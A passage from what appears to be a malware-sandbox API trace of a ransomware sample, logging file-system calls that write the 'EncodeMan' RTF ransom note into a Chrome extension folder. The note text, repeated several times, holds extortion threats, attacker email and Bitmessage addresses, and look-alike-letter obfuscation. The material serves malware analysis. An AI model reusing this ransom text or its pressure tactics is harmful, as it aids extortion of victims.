add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236fd38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x97\x03\x1a»oo¸«¤ÊK¨\n\x02ÈG,ÈàZÿ\x95\x99\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0285.250] WriteFile (in: hFile=0x294, lpBuffer=0x236fd38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236fd38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.251] CloseHandle (hObject=0x294) returned 1 [0285.251] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0285.251] GetLastError () returned 0x2 [0285.251] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 